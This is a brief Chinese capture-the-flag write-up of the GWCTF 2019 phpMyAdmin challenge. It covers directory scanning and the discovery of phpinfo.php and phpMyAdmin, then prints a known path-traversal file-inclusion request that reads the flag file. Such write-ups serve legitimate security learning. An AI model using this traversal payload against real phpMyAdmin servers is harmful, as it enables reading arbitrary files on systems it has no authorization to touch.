[GWCTF 2019]我有一个数据库.md


首页长这样

dirsearch扫到了robots.txt

访问/phpinfo.php

宁就是webmaster嘛www

既然他说和数据库有关,那就记一下叭(虽然不知道有什么用)


还有一个phpmyadmin扫到了,不知道是啥

emmm没有思路,看看版本号蛮可疑的

看不懂,但能抄.jpg(脚本小子实锤)

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../flag

#Web #PHP #目录扫描 #phpmyadmin #Vulnerabilities #信息检索